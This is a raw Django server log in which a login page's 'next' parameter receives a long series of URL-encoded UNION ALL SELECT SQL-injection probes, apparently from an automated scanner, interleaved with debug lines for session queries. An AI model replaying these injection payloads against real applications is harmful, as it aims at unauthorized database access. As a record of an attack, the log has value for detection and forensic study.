/login/?next=-9282%20UNION%20ALL%20SELECT%20NULL%2C%27qxvkq%27%7C%7C%27wsGCNZVVVs%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20vrqL HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:26,272 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ndrqt6obanvyuhp9cuakcn02i8p7x1vf' LIMIT 1; args=('ndrqt6obanvyuhp9cuakcn02i8p7x1vf',) DEBUG 2020-01-01 15:25:26,274 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ndrqt6obanvyuhp9cuakcn02i8p7x1vf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:26.272582+00:00'::timestamptz); args=('ndrqt6obanvyuhp9cuakcn02i8p7x1vf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 26, 272582, tzinfo=)) [01/Jan/2020 15:25:26] "GET /login/?next=-9071%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27zXWRGypGHT%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20vGoH HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:26,439 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'l1d2etdhmflk4rvqnsfm42iqxnrhfcei' LIMIT 1; args=('l1d2etdhmflk4rvqnsfm42iqxnrhfcei',) DEBUG 2020-01-01 15:25:26,441 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('l1d2etdhmflk4rvqnsfm42iqxnrhfcei', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:26.439775+00:00'::timestamptz); args=('l1d2etdhmflk4rvqnsfm42iqxnrhfcei', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 26, 439775, tzinfo=)) [01/Jan/2020 15:25:26] "GET /login/?next=-2723%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27iwkNWDLXjX%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20mPhz HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:26,616 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ol30v67ejhv7xzzzthv9lebwpc4xqkws' LIMIT 1; args=('ol30v67ejhv7xzzzthv9lebwpc4xqkws',) DEBUG 2020-01-01 15:25:26,619 utils 2749 140297233225472 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ol30v67ejhv7xzzzthv9lebwpc4xqkws', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:26.616846+00:00'::timestamptz); args=('ol30v67ejhv7xzzzthv9lebwpc4xqkws', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 26, 616846, tzinfo=)) [01/Jan/2020 15:25:26] "GET /login/?next=-2135%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27JtmSbSLPgN%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20oBbp HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:26,801 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'i33n4y4eqjhf9uaqnenyt49karp1vr3e' LIMIT 1; args=('i33n4y4eqjhf9uaqnenyt49karp1vr3e',) DEBUG 2020-01-01 15:25:26,803 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('i33n4y4eqjhf9uaqnenyt49karp1vr3e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:26.801598+00:00'::timestamptz); args=('i33n4y4eqjhf9uaqnenyt49karp1vr3e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 26, 801598, tzinfo=)) [01/Jan/2020 15:25:26] "GET /login/?next=-6738%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27TaAPDfxWlP%27%7C%7C%27qppzq%27%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20dHhl HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:26,975 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'tnv9ccsq5xz1itp745f3i35kw7q14myd' LIMIT 1; args=('tnv9ccsq5xz1itp745f3i35kw7q14myd',) DEBUG 2020-01-01 15:25:26,978 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('tnv9ccsq5xz1itp745f3i35kw7q14myd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:26.976448+00:00'::timestamptz); args=('tnv9ccsq5xz1itp745f3i35kw7q14myd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 26, 976448, tzinfo=)) [01/Jan/2020 15:25:26] "GET /login/?next=-4846%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27pSJrtPdoMM%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20ofvl HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:27,143 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'lh6hr990b5mvsfvxgoxbqylvt5yp4zjq' LIMIT 1; args=('lh6hr990b5mvsfvxgoxbqylvt5yp4zjq',) DEBUG 2020-01-01 15:25:27,146 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('lh6hr990b5mvsfvxgoxbqylvt5yp4zjq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:27.144521+00:00'::timestamptz); args=('lh6hr990b5mvsfvxgoxbqylvt5yp4zjq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 27, 144521, tzinfo=)) [01/Jan/2020 15:25:27] "GET /login/?next=-1392%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27uhJNUSWTDj%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20hdSl HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:27,320 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3xki460sbtsdrbanjj4nhbzd3o5encay' LIMIT 1; args=('3xki460sbtsdrbanjj4nhbzd3o5encay',) DEBUG 2020-01-01 15:25:27,323 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3xki460sbtsdrbanjj4nhbzd3o5encay', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:27.321209+00:00'::timestamptz); args=('3xki460sbtsdrbanjj4nhbzd3o5encay', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 27, 321209, tzinfo=)) [01/Jan/2020 15:25:27] "GET /login/?next=-8599%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27MPTmmCbaso%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20LabY HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:27,487 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '39cp8icgupei0x8efngcij3vv775ugd5' LIMIT 1; args=('39cp8icgupei0x8efngcij3vv775ugd5',) DEBUG 2020-01-01 15:25:27,489 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('39cp8icgupei0x8efngcij3vv775ugd5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:27.487639+00:00'::timestamptz); args=('39cp8icgupei0x8efngcij3vv775ugd5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 27, 487639, tzinfo=)) [01/Jan/2020 15:25:27] "GET /login/?next=-5895%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27gIEnsTzraI%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20mFFV HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:27,638 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ooqtngfc9nifcu4s09iz1vi3t5djopc2' LIMIT 1; args=('ooqtngfc9nifcu4s09iz1vi3t5djopc2',) DEBUG 2020-01-01 15:25:27,640 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ooqtngfc9nifcu4s09iz1vi3t5djopc2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:27.639341+00:00'::timestamptz); args=('ooqtngfc9nifcu4s09iz1vi3t5djopc2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 27, 639341, tzinfo=)) [01/Jan/2020 15:25:27] "GET /login/?next=-2181%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27RTNDBHJBJI%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20hWKQ HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:27,793 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2ijeh9wgagds6b8g83qhgp5s70to40v6' LIMIT 1; args=('2ijeh9wgagds6b8g83qhgp5s70to40v6',) DEBUG 2020-01-01 15:25:27,795 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2ijeh9wgagds6b8g83qhgp5s70to40v6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:27.793500+00:00'::timestamptz); args=('2ijeh9wgagds6b8g83qhgp5s70to40v6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 27, 793500, tzinfo=)) [01/Jan/2020 15:25:27] "GET /login/?next=-4384%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27rYNaaMrBEy%27%7C%7C%27qppzq%27%2CNULL%20FROM%20MSysAccessObjects--%20YuUr HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:27,975 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'l591sqhnipolivaxpzpwbg0mn6e7uucs' LIMIT 1; args=('l591sqhnipolivaxpzpwbg0mn6e7uucs',) DEBUG 2020-01-01 15:25:27,977 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('l591sqhnipolivaxpzpwbg0mn6e7uucs', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:27.976099+00:00'::timestamptz); args=('l591sqhnipolivaxpzpwbg0mn6e7uucs', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 27, 976099, tzinfo=)) [01/Jan/2020 15:25:27] "GET /login/?next=-5747%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27xcbgbWGNmZ%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20OamO HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:28,142 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'wrh9g2p58elp9p0olpc7zyfegeijbzdt' LIMIT 1; args=('wrh9g2p58elp9p0olpc7zyfegeijbzdt',) DEBUG 2020-01-01 15:25:28,145 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('wrh9g2p58elp9p0olpc7zyfegeijbzdt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:28.143450+00:00'::timestamptz); args=('wrh9g2p58elp9p0olpc7zyfegeijbzdt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 28, 143450, tzinfo=)) [01/Jan/2020 15:25:28] "GET /login/?next=-6284%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27PMkqAvZmyQ%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20lQKp HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:28,331 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'fz2oydd2xe8e9kp6naucxgxgg74gzjew' LIMIT 1; args=('fz2oydd2xe8e9kp6naucxgxgg74gzjew',) DEBUG 2020-01-01 15:25:28,334 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('fz2oydd2xe8e9kp6naucxgxgg74gzjew', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:28.332416+00:00'::timestamptz); args=('fz2oydd2xe8e9kp6naucxgxgg74gzjew', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 28, 332416, tzinfo=)) [01/Jan/2020 15:25:28] "GET /login/?next=-9684%20UNION%20ALL%20SELECT%20%27qxvkq%27%7C%7C%27XgeHRRwFvJ%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20oPxJ HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:28,532 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'c1swx4ijrdwdwmle5m06bu8z5hotjuhn' LIMIT 1; args=('c1swx4ijrdwdwmle5m06bu8z5hotjuhn',) DEBUG 2020-01-01 15:25:28,535 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('c1swx4ijrdwdwmle5m06bu8z5hotjuhn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:28.533342+00:00'::timestamptz); args=('c1swx4ijrdwdwmle5m06bu8z5hotjuhn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 28, 533342, tzinfo=)) [01/Jan/2020 15:25:28] "GET /login/?next=-3557%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27PPjmxdsOyM%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20jmal HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:28,696 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'qmwu3r1yco0mzoduq8qjpedt6y69m6ai' LIMIT 1; args=('qmwu3r1yco0mzoduq8qjpedt6y69m6ai',) DEBUG 2020-01-01 15:25:28,698 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('qmwu3r1yco0mzoduq8qjpedt6y69m6ai', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:28.697277+00:00'::timestamptz); args=('qmwu3r1yco0mzoduq8qjpedt6y69m6ai', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 28, 697277, tzinfo=)) [01/Jan/2020 15:25:28] "GET /login/?next=-2121%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27qxvkq%27%7C%7C%27nijgLJBtqC%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20tZYu HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:28,862 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'qthzl7cpyj59a5d0xfoky9gyf12gktzq' LIMIT 1; args=('qthzl7cpyj59a5d0xfoky9gyf12gktzq',) DEBUG 2020-01-01 15:25:28,865 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('qthzl7cpyj59a5d0xfoky9gyf12gktzq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:28.863214+00:00'::timestamptz); args=('qthzl7cpyj59a5d0xfoky9gyf12gktzq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 28, 863214, tzinfo=)) [01/Jan/2020 15:25:28] "GET /login/?next=-2236%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27VuZfWhvmCL%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20braP HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:29,026 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'j78tsp5rk9mz3wca5p08kahbkk4jxnv5' LIMIT 1; args=('j78tsp5rk9mz3wca5p08kahbkk4jxnv5',) DEBUG 2020-01-01 15:25:29,029 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('j78tsp5rk9mz3wca5p08kahbkk4jxnv5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:29.027385+00:00'::timestamptz); args=('j78tsp5rk9mz3wca5p08kahbkk4jxnv5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 29, 27385, tzinfo=)) [01/Jan/2020 15:25:29] "GET /login/?next=-3205%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27kLIDMPbChF%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20sujq HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:29,163 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'cw130aw5beluyvx29ojjt4fxz0dtpfat' LIMIT 1; args=('cw130aw5beluyvx29ojjt4fxz0dtpfat',) DEBUG 2020-01-01 15:25:29,165 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('cw130aw5beluyvx29ojjt4fxz0dtpfat', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:29.164385+00:00'::timestamptz); args=('cw130aw5beluyvx29ojjt4fxz0dtpfat', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 29, 164385, tzinfo=)) [01/Jan/2020 15:25:29] "GET /login/?next=-2728%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27ghtotHqJkP%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20pAqs HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:29,312 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'chlhn5g7656dn6e3r6zi9rvhzsqsberd' LIMIT 1; args=('chlhn5g7656dn6e3r6zi9rvhzsqsberd',) DEBUG 2020-01-01 15:25:29,314 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('chlhn5g7656dn6e3r6zi9rvhzsqsberd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:29.312803+00:00'::timestamptz); args=('chlhn5g7656dn6e3r6zi9rvhzsqsberd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 29, 312803, tzinfo=)) [01/Jan/2020 15:25:29] "GET /login/?next=-6895%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27XLFKdaIFYF%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20CpEk HTTP/1.0" 200 2284 DEBUG 2020-01-01 15:25:29,477 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'llu69pk2v6ppus3j8ze63pccze8mrqp3' LIMIT 1; args=('llu69pk2v6ppus3j8ze63pccze8mrqp3',) DEBUG 2020-01-01 15:25:29,480 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('llu69pk2v6ppus3j8ze63pccze8mrqp3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:29.478429+00:00'::timestamptz); args=('llu69pk2v6ppus3j8ze63pccze8mrqp3', 